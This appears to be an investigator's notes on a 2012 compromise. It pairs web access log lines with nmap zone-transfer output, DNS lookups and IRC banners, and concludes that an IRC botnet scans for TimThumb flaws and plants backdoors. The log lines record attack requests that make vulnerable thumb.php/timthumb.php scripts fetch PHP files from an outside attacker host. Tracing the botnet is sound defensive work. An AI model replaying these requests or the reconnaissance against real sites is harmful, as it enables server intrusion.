- server1.justicesolutionsllc.com - - [28/May/2012:09:57:59 -0700] "GET //wp-content/themes/magazinum/scripts/thumb.php?src=http://blogger.com.lochin.org/nina.php HTTP/1.1" 503 291 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
- server1.justicesolutionsllc.com - - [28/May/2012:09:59:26 -0700] "GET //wp-content/themes/magazinum/scripts/timthumb.php?src=http://blogger.com.lochin.org/lin.php HTTP/1.1" 503 291 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
- server1.justicesolutionsllc.com - - [28/May/2012:09:59:26 -0700] "GET //wp-content/themes/magazinum/scripts/timthumb.php?src=http://blogger.com.lochin.org/both.php HTTP/1.1" 503 291 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
- server1.justicesolutionsllc.com - - [28/May/2012:09:59:27 -0700] "GET //wp-content/themes/magazinum/scripts/timthumb.php?src=http://blogger.com.lochin.org/nina.php HTTP/1.1" 503 291 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
- server1.justicesolutionsllc.com - - [28/May/2012:09:59:28 -0700] "GET //wp-content/themes/magazinum/scripts/thumb.php?src=http://blogger.com.lochin.org/lin.php HTTP/1.1" 503 291 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
- server1.justicesolutionsllc.com - - [28/May/2012:09:59:28 -0700] "GET //wp-content/themes/magazinum/scripts/thumb.php?src=http://blogger.com.lochin.org/both.php HTTP/1.1" 503 291 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
- server1.justicesolutionsllc.com - - [28/May/2012:09:59:28 -0700] "GET //wp-content/themes/magazinum/scripts/thumb.php?src=http://blogger.com.lochin.org/nina.php HTTP/1.1" 503 291 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
- http://justicesolutionsllc.com/
- nmap --open --reason --script dns-zone-transfer.nse justicesolutionsllc.com
- Starting Nmap 6.00 ( http://nmap.org ) at 2012-05-28 18:38 Eastern Daylight Time
- Nmap scan report for justicesolutionsllc.com (216.67.225.113)
- Host is up, received reset (0.026s latency).
- rDNS record for 216.67.225.113: server1.justicesolutionsllc.com
- Not shown: 979 closed ports
- Reason: 979 resets
- PORT STATE SERVICE REASON
- 1/tcp open tcpmux syn-ack
- 21/tcp open ftp syn-ack
- 25/tcp open smtp syn-ack
- 53/tcp open domain syn-ack
- | dns-zone-transfer:
- | justicesolutionsllc.com SOA ns1.justicesolutionsllc.com dnsadmin.server1.justicesolutionsllc.com
- | justicesolutionsllc.com MX justicesolutionsllc.com
- | justicesolutionsllc.com NS ns1.justicesolutionsllc.com
- | justicesolutionsllc.com NS ns2.justicesolutionsllc.com
- | justicesolutionsllc.com A 216.67.225.113
- | cpanel.justicesolutionsllc.com A 216.67.225.113
- | ftp.justicesolutionsllc.com A 216.67.225.113
- | localhost.justicesolutionsllc.com A 127.0.0.1
- | mail.justicesolutionsllc.com CNAME justicesolutionsllc.com
- | ns1.justicesolutionsllc.com A 216.67.225.113
- | ns2.justicesolutionsllc.com A 208.116.44.41
- | server1.justicesolutionsllc.com A 208.116.44.41
- | webdisk.justicesolutionsllc.com A 216.67.225.113
- | webmail.justicesolutionsllc.com A 216.67.225.113
- | whm.justicesolutionsllc.com A 216.67.225.113
- | www.justicesolutionsllc.com CNAME justicesolutionsllc.com
- |_justicesolutionsllc.com SOA ns1.justicesolutionsllc.com dnsadmin.server1.justicesolutionsllc.com
- 80/tcp open http syn-ack
- 100/tcp open newacct syn-ack
- 110/tcp open pop3 syn-ack
- 111/tcp open rpcbind syn-ack
- 143/tcp open imap syn-ack
- 443/tcp open https syn-ack
- 465/tcp open smtps syn-ack
- 587/tcp open submission syn-ack
- 993/tcp open imaps syn-ack
- 995/tcp open pop3s syn-ack
- 3306/tcp open mysql syn-ack
- 6667/tcp open irc syn-ack
- 6668/tcp open irc syn-ack
- 6669/tcp open irc syn-ack
- 7000/tcp open afs3-fileserver syn-ack
- 8000/tcp open http-alt syn-ack
- 8001/tcp open vcom-tunnel syn-ack
- | server1.justicesolutionsllc.com A 208.116.44.41
- 208.116.44.41 redirects to wylandflorida.com
- Non-authoritative answer:
- Name: wylandflorida.com
- Address: 216.67.225.113
- wylandflorida.com comes back to 216.67.225.113 which aliases to server1.justicesolutionsllc.com
- http://justicesolutionsllc.com:6669 = irc.siantar.org
- :server1.siantar.org NOTICE AUTH :*** Looking up your hostname...
- :server1.siantar.org NOTICE AUTH :*** Checking ident...
- :server1.siantar.org NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
- :server1.siantar.org NOTICE AUTH :*** No ident response; username prefixed with ~
- :server1.siantar.org 451 GET :You have not registered
- :server1.siantar.org 451 User-Agent: :You have not registered
- :server1.siantar.org 451 Host: :You have not registered
- :server1.siantar.org 451 Accept: :You have not registered
- :server1.siantar.org 451 Accept-Language: :You have not registered
- :server1.siantar.org 451 Accept-Encoding: :You have not registered
- :server1.siantar.org 451 Connection: :You have not registered
- PING irc.siantar.org (173.44.171.98) 56(84) bytes of data.
- http://173.44.171.98:6669/
- :server2.siantar.org NOTICE AUTH :*** Looking up your hostname...
- :server2.siantar.org NOTICE AUTH :*** Checking ident...
- :server2.siantar.org NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
- :server2.siantar.org NOTICE AUTH :*** No ident response; username prefixed with ~
- :server2.siantar.org 451 GET :You have not registered
- :server2.siantar.org 451 User-Agent: :You have not registered
- :server2.siantar.org 451 Host: :You have not registered
- :server2.siantar.org 451 Accept: :You have not registered
- :server2.siantar.org 451 Accept-Language: :You have not registered
- :server2.siantar.org 451 Accept-Encoding: :You have not registered
- :server2.siantar.org 451 Connection: :You have not registered
- siantar.org redirects to http://globalnetsiantar.blogspot.com/
- http://blogger.com.lochin.org/
- Non-authoritative answer:
- Name: lochin.org
- Address: 94.141.22.74
- Non-authoritative answer:
- Name: blogger.com.lochin.org
- Address: 94.141.22.74
- Name: srv-hp6.netsons.net
- Address: 94.141.22.74
- ____________________________________________
- irc.siantar.org channels are used to scan websites for TimThumb vulns; bots post back findings and list backdoors installed on servers.